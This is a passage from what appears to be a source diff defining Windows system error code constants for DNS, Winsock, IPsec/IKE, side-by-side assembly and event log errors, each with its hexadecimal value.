0x251F + DNS_ERROR_RCODE = 0x2520 + DNS_ERROR_UNSECURE_PACKET = 0x2521 + DNS_ERROR_INVALID_TYPE = 0x254F + DNS_ERROR_INVALID_IP_ADDRESS = 0x2550 + DNS_ERROR_INVALID_PROPERTY = 0x2551 + DNS_ERROR_TRY_AGAIN_LATER = 0x2552 + DNS_ERROR_NOT_UNIQUE = 0x2553 + DNS_ERROR_NON_RFC_NAME = 0x2554 + DNS_STATUS_FQDN = 0x2555 + DNS_STATUS_DOTTED_NAME = 0x2556 + DNS_STATUS_SINGLE_PART_NAME = 0x2557 + DNS_ERROR_INVALID_NAME_CHAR = 0x2558 + DNS_ERROR_NUMERIC_NAME = 0x2559 + DNS_ERROR_NOT_ALLOWED_ON_ROOT_SERVER = 0x255A + DNS_ERROR_NOT_ALLOWED_UNDER_DELEGATION = 0x255B + DNS_ERROR_CANNOT_FIND_ROOT_HINTS = 0x255C + DNS_ERROR_INCONSISTENT_ROOT_HINTS = 0x255D + DNS_ERROR_DWORD_VALUE_TOO_SMALL = 0x255E + DNS_ERROR_DWORD_VALUE_TOO_LARGE = 0x255F + DNS_ERROR_BACKGROUND_LOADING = 0x2560 + DNS_ERROR_NOT_ALLOWED_ON_RODC = 0x2561 + DNS_ERROR_NOT_ALLOWED_UNDER_DNAME = 0x2562 + DNS_ERROR_DELEGATION_REQUIRED = 0x2563 + DNS_ERROR_INVALID_POLICY_TABLE = 0x2564 + DNS_ERROR_ZONE_DOES_NOT_EXIST = 0x2581 + DNS_ERROR_NO_ZONE_INFO = 0x2582 + DNS_ERROR_INVALID_ZONE_OPERATION = 0x2583 + DNS_ERROR_ZONE_CONFIGURATION_ERROR = 0x2584 + DNS_ERROR_ZONE_HAS_NO_SOA_RECORD = 0x2585 + DNS_ERROR_ZONE_HAS_NO_NS_RECORDS = 0x2586 + DNS_ERROR_ZONE_LOCKED = 0x2587 + DNS_ERROR_ZONE_CREATION_FAILED = 0x2588 + DNS_ERROR_ZONE_ALREADY_EXISTS = 0x2589 + DNS_ERROR_AUTOZONE_ALREADY_EXISTS = 0x258A + DNS_ERROR_INVALID_ZONE_TYPE = 0x258B + DNS_ERROR_SECONDARY_REQUIRES_MASTER_IP = 0x258C + DNS_ERROR_ZONE_NOT_SECONDARY = 0x258D + DNS_ERROR_NEED_SECONDARY_ADDRESSES = 0x258E + DNS_ERROR_WINS_INIT_FAILED = 0x258F + DNS_ERROR_NEED_WINS_SERVERS = 0x2590 + DNS_ERROR_NBSTAT_INIT_FAILED = 0x2591 + DNS_ERROR_SOA_DELETE_INVALID = 0x2592 + DNS_ERROR_FORWARDER_ALREADY_EXISTS = 0x2593 + DNS_ERROR_ZONE_REQUIRES_MASTER_IP = 0x2594 + DNS_ERROR_ZONE_IS_SHUTDOWN = 0x2595 + DNS_ERROR_PRIMARY_REQUIRES_DATAFILE = 0x25B3 + DNS_ERROR_INVALID_DATAFILE_NAME = 0x25B4 + DNS_ERROR_DATAFILE_OPEN_FAILURE = 0x25B5 + DNS_ERROR_FILE_WRITEBACK_FAILED = 0x25B6 + DNS_ERROR_DATAFILE_PARSING = 0x25B7 + DNS_ERROR_RECORD_DOES_NOT_EXIST = 0x25E5 + DNS_ERROR_RECORD_FORMAT = 0x25E6 + DNS_ERROR_NODE_CREATION_FAILED = 0x25E7 + DNS_ERROR_UNKNOWN_RECORD_TYPE = 0x25E8 + DNS_ERROR_RECORD_TIMED_OUT = 0x25E9 + DNS_ERROR_NAME_NOT_IN_ZONE = 0x25EA + DNS_ERROR_CNAME_LOOP = 0x25EB + DNS_ERROR_NODE_IS_CNAME = 0x25EC + DNS_ERROR_CNAME_COLLISION = 0x25ED + DNS_ERROR_RECORD_ONLY_AT_ZONE_ROOT = 0x25EE + DNS_ERROR_RECORD_ALREADY_EXISTS = 0x25EF + DNS_ERROR_SECONDARY_DATA = 0x25F0 + DNS_ERROR_NO_CREATE_CACHE_DATA = 0x25F1 + DNS_ERROR_NAME_DOES_NOT_EXIST = 0x25F2 + DNS_WARNING_PTR_CREATE_FAILED = 0x25F3 + DNS_WARNING_DOMAIN_UNDELETED = 0x25F4 + DNS_ERROR_DS_UNAVAILABLE = 0x25F5 + DNS_ERROR_DS_ZONE_ALREADY_EXISTS = 0x25F6 + DNS_ERROR_NO_BOOTFILE_IF_DS_ZONE = 0x25F7 + DNS_ERROR_NODE_IS_DNAME = 0x25F8 + DNS_ERROR_DNAME_COLLISION = 0x25F9 + DNS_ERROR_ALIAS_LOOP = 0x25FA + DNS_INFO_AXFR_COMPLETE = 0x2617 + DNS_ERROR_AXFR = 0x2618 + DNS_INFO_ADDED_LOCAL_WINS = 0x2619 + DNS_STATUS_CONTINUE_NEEDED = 0x2649 + DNS_ERROR_NO_TCPIP = 0x267B + DNS_ERROR_NO_DNS_SERVERS = 0x267C + DNS_ERROR_DP_DOES_NOT_EXIST = 0x26AD + DNS_ERROR_DP_ALREADY_EXISTS = 0x26AE + DNS_ERROR_DP_NOT_ENLISTED = 0x26AF + DNS_ERROR_DP_ALREADY_ENLISTED = 0x26B0 + DNS_ERROR_DP_NOT_AVAILABLE = 0x26B1 + DNS_ERROR_DP_FSMO_ERROR = 0x26B2 + WSAEINTR = 0x2714 + WSAEBADF = 0x2719 + WSAEACCES = 0x271D + WSAEFAULT = 0x271E + WSAEINVAL = 0x2726 + WSAEMFILE = 0x2728 + WSAEWOULDBLOCK = 0x2733 + WSAEINPROGRESS = 0x2734 + WSAEALREADY = 0x2735 + WSAENOTSOCK = 0x2736 + WSAEDESTADDRREQ = 0x2737 + WSAEMSGSIZE = 0x2738 + WSAEPROTOTYPE = 0x2739 + WSAENOPROTOOPT = 0x273A + WSAEPROTONOSUPPORT = 0x273B + WSAESOCKTNOSUPPORT = 0x273C + WSAEOPNOTSUPP = 0x273D + WSAEPFNOSUPPORT = 0x273E + WSAEAFNOSUPPORT = 0x273F + WSAEADDRINUSE = 0x2740 + WSAEADDRNOTAVAIL = 0x2741 + WSAENETDOWN = 0x2742 + WSAENETUNREACH = 0x2743 + WSAENETRESET = 0x2744 + WSAECONNABORTED = 0x2745 + WSAECONNRESET = 0x2746 + WSAENOBUFS = 0x2747 + WSAEISCONN = 0x2748 + WSAENOTCONN = 0x2749 + WSAESHUTDOWN = 0x274A + WSAETOOMANYREFS = 0x274B + WSAETIMEDOUT = 0x274C + WSAECONNREFUSED = 0x274D + WSAELOOP = 0x274E + WSAENAMETOOLONG = 0x274F + WSAEHOSTDOWN = 0x2750 + WSAEHOSTUNREACH = 0x2751 + WSAENOTEMPTY = 0x2752 + WSAEPROCLIM = 0x2753 + WSAEUSERS = 0x2754 + WSAEDQUOT = 0x2755 + WSAESTALE = 0x2756 + WSAEREMOTE = 0x2757 + WSASYSNOTREADY = 0x276B + WSAVERNOTSUPPORTED = 0x276C + WSANOTINITIALISED = 0x276D + WSAEDISCON = 0x2775 + WSAENOMORE = 0x2776 + WSAECANCELLED = 0x2777 + WSAEINVALIDPROCTABLE = 0x2778 + WSAEINVALIDPROVIDER = 0x2779 + WSAEPROVIDERFAILEDINIT = 0x277A + WSASYSCALLFAILURE = 0x277B + WSASERVICE_NOT_FOUND = 0x277C + WSATYPE_NOT_FOUND = 0x277D + WSA_E_NO_MORE = 0x277E + WSA_E_CANCELLED = 0x277F + WSAEREFUSED = 0x2780 + WSAHOST_NOT_FOUND = 0x2AF9 + WSATRY_AGAIN = 0x2AFA + WSANO_RECOVERY = 0x2AFB + WSANO_DATA = 0x2AFC + WSA_QOS_RECEIVERS = 0x2AFD + WSA_QOS_SENDERS = 0x2AFE + WSA_QOS_NO_SENDERS = 0x2AFF + WSA_QOS_NO_RECEIVERS = 0x2B00 + WSA_QOS_REQUEST_CONFIRMED = 0x2B01 + WSA_QOS_ADMISSION_FAILURE = 0x2B02 + WSA_QOS_POLICY_FAILURE = 0x2B03 + WSA_QOS_BAD_STYLE = 0x2B04 + WSA_QOS_BAD_OBJECT = 0x2B05 + WSA_QOS_TRAFFIC_CTRL_ERROR = 0x2B06 + WSA_QOS_GENERIC_ERROR = 0x2B07 + WSA_QOS_ESERVICETYPE = 0x2B08 + WSA_QOS_EFLOWSPEC = 0x2B09 + WSA_QOS_EPROVSPECBUF = 0x2B0A + WSA_QOS_EFILTERSTYLE = 0x2B0B + WSA_QOS_EFILTERTYPE = 0x2B0C + WSA_QOS_EFILTERCOUNT = 0x2B0D + WSA_QOS_EOBJLENGTH = 0x2B0E + WSA_QOS_EFLOWCOUNT = 0x2B0F + WSA_QOS_EUNKNOWNPSOBJ = 0x2B10 + WSA_QOS_EPOLICYOBJ = 0x2B11 + WSA_QOS_EFLOWDESC = 0x2B12 + WSA_QOS_EPSFLOWSPEC = 0x2B13 + WSA_QOS_EPSFILTERSPEC = 0x2B14 + WSA_QOS_ESDMODEOBJ = 0x2B15 + WSA_QOS_ESHAPERATEOBJ = 0x2B16 + WSA_QOS_RESERVED_PETYPE = 0x2B17 + ERROR_IPSEC_QM_POLICY_EXISTS = 0x32C8 + ERROR_IPSEC_QM_POLICY_NOT_FOUND = 0x32C9 + ERROR_IPSEC_QM_POLICY_IN_USE = 0x32CA + ERROR_IPSEC_MM_POLICY_EXISTS = 0x32CB + ERROR_IPSEC_MM_POLICY_NOT_FOUND = 0x32CC + ERROR_IPSEC_MM_POLICY_IN_USE = 0x32CD + ERROR_IPSEC_MM_FILTER_EXISTS = 0x32CE + ERROR_IPSEC_MM_FILTER_NOT_FOUND = 0x32CF + ERROR_IPSEC_TRANSPORT_FILTER_EXISTS = 0x32D0 + ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x32D1 + ERROR_IPSEC_MM_AUTH_EXISTS = 0x32D2 + ERROR_IPSEC_MM_AUTH_NOT_FOUND = 0x32D3 + ERROR_IPSEC_MM_AUTH_IN_USE = 0x32D4 + ERROR_IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x32D5 + ERROR_IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x32D6 + ERROR_IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x32D7 + ERROR_IPSEC_TUNNEL_FILTER_EXISTS = 0x32D8 + ERROR_IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x32D9 + ERROR_IPSEC_MM_FILTER_PENDING_DELETION = 0x32DA + ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x32DB + ERROR_IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x32DC + ERROR_IPSEC_MM_POLICY_PENDING_DELETION = 0x32DD + ERROR_IPSEC_MM_AUTH_PENDING_DELETION = 0x32DE + ERROR_IPSEC_QM_POLICY_PENDING_DELETION = 0x32DF + WARNING_IPSEC_MM_POLICY_PRUNED = 0x32E0 + WARNING_IPSEC_QM_POLICY_PRUNED = 0x32E1 + ERROR_IPSEC_IKE_AUTH_FAIL = 0x35E9 + ERROR_IPSEC_IKE_ATTRIB_FAIL = 0x35EA + ERROR_IPSEC_IKE_NEGOTIATION_PENDING = 0x35EB + ERROR_IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x35EC + ERROR_IPSEC_IKE_TIMED_OUT = 0x35ED + ERROR_IPSEC_IKE_NO_CERT = 0x35EE + ERROR_IPSEC_IKE_SA_DELETED = 0x35EF + ERROR_IPSEC_IKE_SA_REAPED = 0x35F0 + ERROR_IPSEC_IKE_MM_ACQUIRE_DROP = 0x35F1 + ERROR_IPSEC_IKE_QM_ACQUIRE_DROP = 0x35F2 + ERROR_IPSEC_IKE_QUEUE_DROP_MM = 0x35F3 + ERROR_IPSEC_IKE_QUEUE_DROP_NO_MM = 0x35F4 + ERROR_IPSEC_IKE_DROP_NO_RESPONSE = 0x35F5 + ERROR_IPSEC_IKE_MM_DELAY_DROP = 0x35F6 + ERROR_IPSEC_IKE_QM_DELAY_DROP = 0x35F7 + ERROR_IPSEC_IKE_ERROR = 0x35F8 + ERROR_IPSEC_IKE_CRL_FAILED = 0x35F9 + ERROR_IPSEC_IKE_INVALID_KEY_USAGE = 0x35FA + ERROR_IPSEC_IKE_INVALID_CERT_TYPE = 0x35FB + ERROR_IPSEC_IKE_NO_PRIVATE_KEY = 0x35FC + ERROR_IPSEC_IKE_DH_FAIL = 0x35FE + ERROR_IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x35FF + ERROR_IPSEC_IKE_INVALID_HEADER = 0x3600 + ERROR_IPSEC_IKE_NO_POLICY = 0x3601 + ERROR_IPSEC_IKE_INVALID_SIGNATURE = 0x3602 + ERROR_IPSEC_IKE_KERBEROS_ERROR = 0x3603 + ERROR_IPSEC_IKE_NO_PUBLIC_KEY = 0x3604 + ERROR_IPSEC_IKE_PROCESS_ERR = 0x3605 + ERROR_IPSEC_IKE_PROCESS_ERR_SA = 0x3606 + ERROR_IPSEC_IKE_PROCESS_ERR_PROP = 0x3607 + ERROR_IPSEC_IKE_PROCESS_ERR_TRANS = 0x3608 + ERROR_IPSEC_IKE_PROCESS_ERR_KE = 0x3609 + ERROR_IPSEC_IKE_PROCESS_ERR_ID = 0x360A + ERROR_IPSEC_IKE_PROCESS_ERR_CERT = 0x360B + ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x360C + ERROR_IPSEC_IKE_PROCESS_ERR_HASH = 0x360D + ERROR_IPSEC_IKE_PROCESS_ERR_SIG = 0x360E + ERROR_IPSEC_IKE_PROCESS_ERR_NONCE = 0x360F + ERROR_IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x3610 + ERROR_IPSEC_IKE_PROCESS_ERR_DELETE = 0x3611 + ERROR_IPSEC_IKE_PROCESS_ERR_VENDOR = 0x3612 + ERROR_IPSEC_IKE_INVALID_PAYLOAD = 0x3613 + ERROR_IPSEC_IKE_LOAD_SOFT_SA = 0x3614 + ERROR_IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x3615 + ERROR_IPSEC_IKE_INVALID_COOKIE = 0x3616 + ERROR_IPSEC_IKE_NO_PEER_CERT = 0x3617 + ERROR_IPSEC_IKE_PEER_CRL_FAILED = 0x3618 + ERROR_IPSEC_IKE_POLICY_CHANGE = 0x3619 + ERROR_IPSEC_IKE_NO_MM_POLICY = 0x361A + ERROR_IPSEC_IKE_NOTCBPRIV = 0x361B + ERROR_IPSEC_IKE_SECLOADFAIL = 0x361C + ERROR_IPSEC_IKE_FAILSSPINIT = 0x361D + ERROR_IPSEC_IKE_FAILQUERYSSP = 0x361E + ERROR_IPSEC_IKE_SRVACQFAIL = 0x361F + ERROR_IPSEC_IKE_SRVQUERYCRED = 0x3620 + ERROR_IPSEC_IKE_GETSPIFAIL = 0x3621 + ERROR_IPSEC_IKE_INVALID_FILTER = 0x3622 + ERROR_IPSEC_IKE_OUT_OF_MEMORY = 0x3623 + ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x3624 + ERROR_IPSEC_IKE_INVALID_POLICY = 0x3625 + ERROR_IPSEC_IKE_UNKNOWN_DOI = 0x3626 + ERROR_IPSEC_IKE_INVALID_SITUATION = 0x3627 + ERROR_IPSEC_IKE_DH_FAILURE = 0x3628 + ERROR_IPSEC_IKE_INVALID_GROUP = 0x3629 + ERROR_IPSEC_IKE_ENCRYPT = 0x362A + ERROR_IPSEC_IKE_DECRYPT = 0x362B + ERROR_IPSEC_IKE_POLICY_MATCH = 0x362C + ERROR_IPSEC_IKE_UNSUPPORTED_ID = 0x362D + ERROR_IPSEC_IKE_INVALID_HASH = 0x362E + ERROR_IPSEC_IKE_INVALID_HASH_ALG = 0x362F + ERROR_IPSEC_IKE_INVALID_HASH_SIZE = 0x3630 + ERROR_IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x3631 + ERROR_IPSEC_IKE_INVALID_AUTH_ALG = 0x3632 + ERROR_IPSEC_IKE_INVALID_SIG = 0x3633 + ERROR_IPSEC_IKE_LOAD_FAILED = 0x3634 + ERROR_IPSEC_IKE_RPC_DELETE = 0x3635 + ERROR_IPSEC_IKE_BENIGN_REINIT = 0x3636 + ERROR_IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x3637 + ERROR_IPSEC_IKE_QM_LIMIT_REAP = 0x3638 + ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN = 0x3639 + ERROR_IPSEC_IKE_MM_LIMIT = 0x363A + ERROR_IPSEC_IKE_NEGOTIATION_DISABLED = 0x363B + ERROR_IPSEC_IKE_QM_LIMIT = 0x363C + ERROR_IPSEC_IKE_MM_EXPIRED = 0x363D + ERROR_IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x363E + ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x363F + ERROR_IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x3640 + ERROR_IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x3641 + ERROR_IPSEC_IKE_DOS_COOKIE_SENT = 0x3642 + ERROR_IPSEC_IKE_SHUTTING_DOWN = 0x3643 + ERROR_IPSEC_IKE_CGA_AUTH_FAILED = 0x3644 + ERROR_IPSEC_IKE_PROCESS_ERR_NATOA = 0x3645 + ERROR_IPSEC_IKE_INVALID_MM_FOR_QM = 0x3646 + ERROR_IPSEC_IKE_QM_EXPIRED = 0x3647 + ERROR_IPSEC_IKE_TOO_MANY_FILTERS = 0x3648 + ERROR_IPSEC_IKE_NEG_STATUS_END = 0x3649 + ERROR_IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x364A + ERROR_IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x364B + ERROR_IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x364C + ERROR_IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x364D + ERROR_IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x364E + ERROR_IPSEC_IKE_RATELIMIT_DROP = 0x364F + ERROR_IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x3650 + ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE = 0x3651 + ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x3652 + ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x3653 + ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x3654 + ERROR_IPSEC_BAD_SPI = 0x3656 + ERROR_IPSEC_SA_LIFETIME_EXPIRED = 0x3657 + ERROR_IPSEC_WRONG_SA = 0x3658 + ERROR_IPSEC_REPLAY_CHECK_FAILED = 0x3659 + ERROR_IPSEC_INVALID_PACKET = 0x365A + ERROR_IPSEC_INTEGRITY_CHECK_FAILED = 0x365B + ERROR_IPSEC_CLEAR_TEXT_DROP = 0x365C + ERROR_IPSEC_AUTH_FIREWALL_DROP = 0x365D + ERROR_IPSEC_THROTTLE_DROP = 0x365E + ERROR_IPSEC_DOSP_BLOCK = 0x3665 + ERROR_IPSEC_DOSP_RECEIVED_MULTICAST = 0x3666 + ERROR_IPSEC_DOSP_INVALID_PACKET = 0x3667 + ERROR_IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x3668 + ERROR_IPSEC_DOSP_MAX_ENTRIES = 0x3669 + ERROR_IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x366A + ERROR_IPSEC_DOSP_NOT_INSTALLED = 0x366B + ERROR_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x366C + ERROR_SXS_SECTION_NOT_FOUND = 0x36B0 + ERROR_SXS_CANT_GEN_ACTCTX = 0x36B1 + ERROR_SXS_INVALID_ACTCTXDATA_FORMAT = 0x36B2 + ERROR_SXS_ASSEMBLY_NOT_FOUND = 0x36B3 + ERROR_SXS_MANIFEST_FORMAT_ERROR = 0x36B4 + ERROR_SXS_MANIFEST_PARSE_ERROR = 0x36B5 + ERROR_SXS_ACTIVATION_CONTEXT_DISABLED = 0x36B6 + ERROR_SXS_KEY_NOT_FOUND = 0x36B7 + ERROR_SXS_VERSION_CONFLICT = 0x36B8 + ERROR_SXS_WRONG_SECTION_TYPE = 0x36B9 + ERROR_SXS_THREAD_QUERIES_DISABLED = 0x36BA + ERROR_SXS_PROCESS_DEFAULT_ALREADY_SET = 0x36BB + ERROR_SXS_UNKNOWN_ENCODING_GROUP = 0x36BC + ERROR_SXS_UNKNOWN_ENCODING = 0x36BD + ERROR_SXS_INVALID_XML_NAMESPACE_URI = 0x36BE + ERROR_SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36BF + ERROR_SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36C0 + ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36C1 + ERROR_SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x36C2 + ERROR_SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x36C3 + ERROR_SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x36C4 + ERROR_SXS_DUPLICATE_DLL_NAME = 0x36C5 + ERROR_SXS_DUPLICATE_WINDOWCLASS_NAME = 0x36C6 + ERROR_SXS_DUPLICATE_CLSID = 0x36C7 + ERROR_SXS_DUPLICATE_IID = 0x36C8 + ERROR_SXS_DUPLICATE_TLBID = 0x36C9 + ERROR_SXS_DUPLICATE_PROGID = 0x36CA + ERROR_SXS_DUPLICATE_ASSEMBLY_NAME = 0x36CB + ERROR_SXS_FILE_HASH_MISMATCH = 0x36CC + ERROR_SXS_POLICY_PARSE_ERROR = 0x36CD + ERROR_SXS_XML_E_MISSINGQUOTE = 0x36CE + ERROR_SXS_XML_E_COMMENTSYNTAX = 0x36CF + ERROR_SXS_XML_E_BADSTARTNAMECHAR = 0x36D0 + ERROR_SXS_XML_E_BADNAMECHAR = 0x36D1 + ERROR_SXS_XML_E_BADCHARINSTRING = 0x36D2 + ERROR_SXS_XML_E_XMLDECLSYNTAX = 0x36D3 + ERROR_SXS_XML_E_BADCHARDATA = 0x36D4 + ERROR_SXS_XML_E_MISSINGWHITESPACE = 0x36D5 + ERROR_SXS_XML_E_EXPECTINGTAGEND = 0x36D6 + ERROR_SXS_XML_E_MISSINGSEMICOLON = 0x36D7 + ERROR_SXS_XML_E_UNBALANCEDPAREN = 0x36D8 + ERROR_SXS_XML_E_INTERNALERROR = 0x36D9 + ERROR_SXS_XML_E_UNEXPECTED_WHITESPACE = 0x36DA + ERROR_SXS_XML_E_INCOMPLETE_ENCODING = 0x36DB + ERROR_SXS_XML_E_MISSING_PAREN = 0x36DC + ERROR_SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x36DD + ERROR_SXS_XML_E_MULTIPLE_COLONS = 0x36DE + ERROR_SXS_XML_E_INVALID_DECIMAL = 0x36DF + ERROR_SXS_XML_E_INVALID_HEXIDECIMAL = 0x36E0 + ERROR_SXS_XML_E_INVALID_UNICODE = 0x36E1 + ERROR_SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x36E2 + ERROR_SXS_XML_E_UNEXPECTEDENDTAG = 0x36E3 + ERROR_SXS_XML_E_UNCLOSEDTAG = 0x36E4 + ERROR_SXS_XML_E_DUPLICATEATTRIBUTE = 0x36E5 + ERROR_SXS_XML_E_MULTIPLEROOTS = 0x36E6 + ERROR_SXS_XML_E_INVALIDATROOTLEVEL = 0x36E7 + ERROR_SXS_XML_E_BADXMLDECL = 0x36E8 + ERROR_SXS_XML_E_MISSINGROOT = 0x36E9 + ERROR_SXS_XML_E_UNEXPECTEDEOF = 0x36EA + ERROR_SXS_XML_E_BADPEREFINSUBSET = 0x36EB + ERROR_SXS_XML_E_UNCLOSEDSTARTTAG = 0x36EC + ERROR_SXS_XML_E_UNCLOSEDENDTAG = 0x36ED + ERROR_SXS_XML_E_UNCLOSEDSTRING = 0x36EE + ERROR_SXS_XML_E_UNCLOSEDCOMMENT = 0x36EF + ERROR_SXS_XML_E_UNCLOSEDDECL = 0x36F0 + ERROR_SXS_XML_E_UNCLOSEDCDATA = 0x36F1 + ERROR_SXS_XML_E_RESERVEDNAMESPACE = 0x36F2 + ERROR_SXS_XML_E_INVALIDENCODING = 0x36F3 + ERROR_SXS_XML_E_INVALIDSWITCH = 0x36F4 + ERROR_SXS_XML_E_BADXMLCASE = 0x36F5 + ERROR_SXS_XML_E_INVALID_STANDALONE = 0x36F6 + ERROR_SXS_XML_E_UNEXPECTED_STANDALONE = 0x36F7 + ERROR_SXS_XML_E_INVALID_VERSION = 0x36F8 + ERROR_SXS_XML_E_MISSINGEQUALS = 0x36F9 + ERROR_SXS_PROTECTION_RECOVERY_FAILED = 0x36FA + ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x36FB + ERROR_SXS_PROTECTION_CATALOG_NOT_VALID = 0x36FC + ERROR_SXS_UNTRANSLATABLE_HRESULT = 0x36FD + ERROR_SXS_PROTECTION_CATALOG_FILE_MISSING = 0x36FE + ERROR_SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36FF + ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x3700 + ERROR_SXS_ASSEMBLY_MISSING = 0x3701 + ERROR_SXS_CORRUPT_ACTIVATION_STACK = 0x3702 + ERROR_SXS_CORRUPTION = 0x3703 + ERROR_SXS_EARLY_DEACTIVATION = 0x3704 + ERROR_SXS_INVALID_DEACTIVATION = 0x3705 + ERROR_SXS_MULTIPLE_DEACTIVATION = 0x3706 + ERROR_SXS_PROCESS_TERMINATION_REQUESTED = 0x3707 + ERROR_SXS_RELEASE_ACTIVATION_CONTEXT = 0x3708 + ERROR_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x3709 + ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x370A + ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x370B + ERROR_SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x370C + ERROR_SXS_IDENTITY_PARSE_ERROR = 0x370D + ERROR_MALFORMED_SUBSTITUTION_STRING = 0x370E + ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x370F + ERROR_UNMAPPED_SUBSTITUTION_STRING = 0x3710 + ERROR_SXS_ASSEMBLY_NOT_LOCKED = 0x3711 + ERROR_SXS_COMPONENT_STORE_CORRUPT = 0x3712 + ERROR_ADVANCED_INSTALLER_FAILED = 0x3713 + ERROR_XML_ENCODING_MISMATCH = 0x3714 + ERROR_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x3715 + ERROR_SXS_IDENTITIES_DIFFERENT = 0x3716 + ERROR_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x3717 + ERROR_SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x3718 + ERROR_SXS_MANIFEST_TOO_BIG = 0x3719 + ERROR_SXS_SETTING_NOT_REGISTERED = 0x371A + ERROR_SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x371B + ERROR_SMI_PRIMITIVE_INSTALLER_FAILED = 0x371C + ERROR_GENERIC_COMMAND_FAILED = 0x371D + ERROR_SXS_FILE_HASH_MISSING = 0x371E + ERROR_EVT_INVALID_CHANNEL_PATH = 0x3A98 + ERROR_EVT_INVALID_QUERY = 0x3A99 + ERROR_EVT_PUBLISHER_METADATA_NOT_FOUND = 0x3A9A + ERROR_EVT_EVENT_TEMPLATE_NOT_FOUND = 0x3A9B + ERROR_EVT_INVALID_PUBLISHER_NAME = 0x3A9C + ERROR_EVT_INVALID_EVENT_DATA = 0x3A9D + ERROR_EVT_CHANNEL_NOT_FOUND = 0x3A9F + ERROR_EVT_MALFORMED_XML_TEXT = 0x3AA0 + ERROR_EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x3AA1 + ERROR_EVT_CONFIGURATION_ERROR = 0x3AA2 + ERROR_EVT_QUERY_RESULT_STALE = 0x3AA3 + ERROR_EVT_QUERY_RESULT_INVALID_POSITION = 0x3AA4 + ERROR_EVT_NON_VALIDATING_MSXML = 0x3AA5 + ERROR_EVT_FILTER_ALREADYSCOPED = 0x3AA6 + ERROR_EVT_FILTER_NOTELTSET = 0x3AA7 + ERROR_EVT_FILTER_INVARG = 0x3AA8 + ERROR_EVT_FILTER_INVTEST = 0x3AA9 + ERROR_EVT_FILTER_INVTYPE = 0x3AAA + ERROR_EVT_FILTER_PARSEERR = 0x3AAB + ERROR_EVT_FILTER_UNSUPPORTEDOP = 0x3AAC + ERROR_EVT_FILTER_UNEXPECTEDTOKEN = 0x3AAD + ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x3AAE + ERROR_EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x3AAF + ERROR_EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x3AB0 + ERROR_EVT_CHANNEL_CANNOT_ACTIVATE = 0x3AB1 + ERROR_EVT_FILTER_TOO_COMPLEX = 0x3AB2 + ERROR_EVT_MESSAGE_NOT_FOUND = 0x3AB3 + ERROR_EVT_MESSAGE_ID_NOT_FOUND = 0x3AB4 + ERROR_EVT_UNRESOLVED_VALUE_INSERT = 0x3AB5 + ERROR_EVT_UNRESOLVED_PARAMETER_INSERT = 0x3AB6 + ERROR_EVT_MAX_INSERTS_REACHED = 0x3AB7 + ERROR_EVT_EVENT_DEFINITION_NOT_FOUND = 0x3AB8 + ERROR_EVT_MESSAGE_LOCALE_NOT_FOUND = 0x3AB9 + ERROR_EVT_VERSION_TOO_OLD = 0x3ABA + 